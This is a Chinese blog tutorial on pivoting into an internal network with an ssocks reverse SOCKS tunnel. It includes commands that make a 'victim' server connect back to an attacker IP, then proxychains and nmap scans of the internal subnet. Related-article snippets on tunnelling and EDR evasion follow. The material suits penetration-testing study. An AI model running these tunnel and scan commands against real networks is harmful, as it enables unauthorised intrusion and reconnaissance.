内网渗透思路02隧道技术之socket隧道

最新推荐文章于 2024-05-14 11:36:39 发布
最新推荐文章于 2024-05-14 11:36:39 发布
阅读量1k 收藏 1
点赞数
分类专栏: 内网安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43970718/article/details/114450166
版权

Socket的下载安装

下载地址:http://sourceforge.net/projects/ssocks/

受害者Linux服务器与攻击者的kali机器都需要下载socket文件(因为都不自带)

下载之后,cd进入socket目录,使用下面命令进行编译并生成一个文件:

./configure && make

反向连接

攻击机器kali开启监听
Cd到socket下src目录

./rcsocks -l 1088 -p 1080 -vv

//等待远程Socks5服务器访问本地1080端口,并将数据转达到本地端口1088 
//最后的 “ -vv ”是显示过程信息。
受害机器进行会话反弹

./rssocks -vv -s 192.168.0.115:1080

//192.168.0.115是攻击者的IP
利用proxychains进行Socks5代理
Ubuntu中安装proxychains的命令(kali自带不用装):

apt-get install proxychains

在kali里面修改” vim /etc/proxychains.conf “
注释掉socks4 127.0.0.1 9050
在最下方增加socks5 127.0.0.1 1088
代理火狐浏览器,来访问目标内网中10.10.10.128的机器

Proxychains firefox http://10.10.10.128

用kali 里面的nmap扫描 10.10.10.128

proxychains nmap –Pn -sT 10.10.10.128

//socks可以代理tcp流量,但是不能代理ping,因为ping使用的是icmp协议。
//-Pn 是非ping扫描,-sT是3次握手方式tcp的扫描
扫描整个内网

proxychains nmap –Pn -sT 10.10.10.0/24

扫描整个内网中的80端口

proxychains nmap –Pn -sT 10.10.10.0/24 -p 80

其他
Socks有socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,
	
还支持各种身份验证机制	等协议。其标准端口为1080。

补充:Socks支持ftp与http协议
划水的小白白
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
快速使用proxychains设置代理上
weixin_34138377的博客
12-18 3085
快速使用proxychains设置代理上背景介绍:由于公司内部上权限管理比较严格,因此放置在公司内部的测试服务器只有少数可以上。而proxychains就可以非常简单快速的设置好代理,让其它不能上的服务器通过能上的服务器进行上。proxychains只需要在不能上的机器上安装好,而能够上的服务器,是不需要任何配置的,只要能SSH登陆就可以。服务器环境:可以上...
TCP socket端口转发示例代码C#
12-24
C#实现的TCP socket端口转发示例代码,编译后按如下命令运行: demo.exe 127.0.0.1 8080 192.168.0.3 80 即为将本机8080端口TCP流量转发至192.168.0.3 的80端口
渗透-详解代理逻辑及隧道
qq_53058639的博客
08-21 230
红蓝对抗过程中打点以后往往需要进行内渗透和横向移动,因此大家都需要扎实掌握代理和隧道知识,一款优秀的代理工具也可以给内渗透带来很大的收益。本期分享,小星将通过简单易懂的方式向大家普及各种代理逻辑及隧道的原理和操作过程。**1** ****代理客户端,帮助客户端完成所需请求。举例:小星要向银行贷款,可是因为自己资历不够,所以不获银行放贷,小星个人无法贷到所需款项。此时,只要小星找一个满足资历的A先生去帮忙借贷,银行自然就会放贷。贷款到账后,A先生再私下把钱给到小星。
【kali工具使用】ss 命令概述
最新发布
weixin_43822401的博客
05-14 176
ss 命令概述: ss 是 Socket Statistics 的缩写。用来获取 socket 统计信息。它可以显示和 netstat 类似的内容。 ss 的优势在于它能够显示更多更详细的有关 TCP 和连接状态的信息,而且比 netstat 更快速更高效。 参数: -n, --numeric 不解析服务的名称,如 “22” 端口不会显示成 “ssh” -l, --listening 只显示处于监听状态的端口 -t, --tcp 显示 TCP 协议的 sockets
渗透-socket隧道
weixin_45427778的博客
08-18 617
渗透之——SOCKET隧道 使用socket工具: 下载地址http://sourceforge.net/projects/ssocks/ 下载至web服务器与攻击主机KALI进行编译 解压tar zxvf ssocks-0.0.14/ 编译进入目录 ./configure 然后执行 make 端口监听(反向代理——服务器连接攻主机) 在攻击主机执行./rcsocks -l 1088 -p 1080 -vv 等待远程socks5服务器访问本地1080端口,创建端口1080与本地端口10
穿透之利用Neo-reGeorg工具完成socks5代理
li1136594919的博客
09-12 1021
选择靶机能够解析的文件并将其上传到靶机web应用的目录上(使用浏览器访问确认其上传成功且目录正确),然后kali启动代理。修改/etc/proxychains.conf配置文件,将其他socks5代理注释掉,增加。此时firefox的所有流量都会通过burpsuite到达本地1080端口然后到靶机进行转发。利用firefox的foxyproxy插件新增到burpsuite的代理。利用firefox的foxyproxy插件新增到本地1080端口socks5的代理。使用前需要先生成key,进入项目目录,输入。
利用proxychains在终端使用socks5代理
foundamental的博客
01-02 2349
1.proxychains安装 1 2 3 4 5 6 git clone https://github.com/rofl0r/proxychains-ng.git cd proxychains-ng ./configure make && make install cp ./src/proxychains.conf /etc/proxycha...
socks+proxychains络代理_ss5-3
2401_84254364的博客
04-12 395
测试)**[外链图片转存中…(img-SVaa3ezh-1712914278060)]
渗透思路.pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
渗透思路整理与工具使用
12-08
渗透思路整理与工具使用内渗透思路整理与工具使用内渗透思路整理与工具使用内渗透思路整理与工具使用内渗透思路整理与工具使用
渗透流程与思路和工具讲解
04-10
渗透流程与思路和工具讲解 内渗透测试是一个复杂的过程,需要了解目标络的结构、系统配置、软件版本、开放端口等信息。以下是内渗透测试的流程和思路: 1. 内信息收集 在内渗透测试中,信息收集是...
socket一对多端口转发源码
10-10
JAVA SOCKET实现监听本地指定端口,接受到的数据转发到其余服务器端口上,转发的数据为字节形式,可接受文本,文件等数据,配置格式IP#端口即,可进行修改,代码可运行,经过简单的转发测试。
渗透技术总结大全.pdf
12-22
渗透技术总结大全.pdf
渗透课实验—传输层隧道通信.docx
08-29
传输层隧道通信是内渗透实验中的一种重要技术,通过使用 powercat 和 ncpowercat 工具,我们可以实现远程连接和数据传输。同时,我们还可以使用桥接模式来实现远程连接,并使用 Linux 文本编辑器来显示行号。
ProxyChains
weixin_33725239的博客
04-21 580
From:https://qiaohong.org/2016/12/15/proxychains-%E4%B8%8A%E6%89%8B%E6%94%BB%E7%95%A5/ ProxyChains 是一个强制应用的 TCP 连接通过代理的工具,支持 Tor、HTTP、与 Socks 代理。与sshuttle不同的是,ProxyChains ...
proxychains4操作方法
tairitian888的博客
06-19 1059
命令行键入 proxychains4 -README file 先ping 一下代理服务器的IP 康一康是否能ping通 ping不通的话代理服务器不能使用 vi /etc/proxychains4.conf i 修改初始设置的IP 并导入 代理类型 代理IP 端口号 ESC :wq proxychains 加上需要代理的渗透工具名称 就可以正常使用 有些工具 如firefox 要在普通用户模式下运行 root模式运行会报错 ...
基础-隧道技术、内穿透(SSH隧道Socket隧道、跨路由扫描)
喜欢Python编程的程序员柚柚呀
03-08 1191
​​环境搭建​​​​SSH隧道​​​​正向连接​​​​反向隧道​​​​sockets代理​​​​MSF端口映射​​​​Socket隧道​​​​ssocks​​​​反向代理​​​​1.建立隧道​​​​2.开启代理​​​​正向代理​​​​扫描内​​​​MSF跨路由扫描​​​​简单收集信息​​​​增加路由​​​​MSF其他模块​​​​推荐阅读​​。
络安全基础篇——攻防环境搭建
Z4400840的博客
05-06 1315
在数字化时代,络安全已经成为每个企业和个人必须面对的挑战。攻防环境的搭建是提升络安全意识和技能的重要手段。本文将带你深入了解攻防环境的概念,以及如何一步步搭建起你自己的攻防实验平台。,即一个模拟真实络环境的实验平台,它可以用来进行安全测试、渗透测试和安全技能训练。通过攻防环境,我们可以在不触及真实系统的前提下,练习和掌握各种安全技能。配置靶机虚拟机的ip和关。
渗透隧道 绕edr
12-28
渗透隧道是指攻击者利用漏洞或弱点,通过渗透手段进入企业内部络,获取敏感信息或对络进行破坏。EDR(终端检测与响应)是一种用于检测和响应恶意软件和其他威胁的安全解决方案。绕过EDR意味着攻击者可以通过各种方式规避被EDR检测到,并且在系统中持续活动且不被发现。 为了绕过EDR,攻击者可能会使用一些技术手段,比如利用未被识别的漏洞或零日漏洞攻击,使用加密通信进行通讯,隐藏恶意代码或行为,规避EDR的检测和阻止。此外,攻击者还可以利用社会工程学手段来诱导内部员工操作,例如诱骗他们点击恶意链接或下载恶意文件,绕过EDR直接在内进行渗透。 企业需要采取一系列安全措施来防范内渗透隧道绕过EDR的攻击,包括加固络安全设备,更新补丁和漏洞修复,加强员工安全意识教育,使用行为分析和机器学习技术来识别异常活动,建立多层次的防御体系等。同时,及时监控和响应络安全事件,加强日志审计和溯源能力也是非常重要的。只有综合利用技术手段和管理措施,企业才能更好地防范内渗透隧道绕过EDR的威胁,保护企业络安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

划水的小白白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值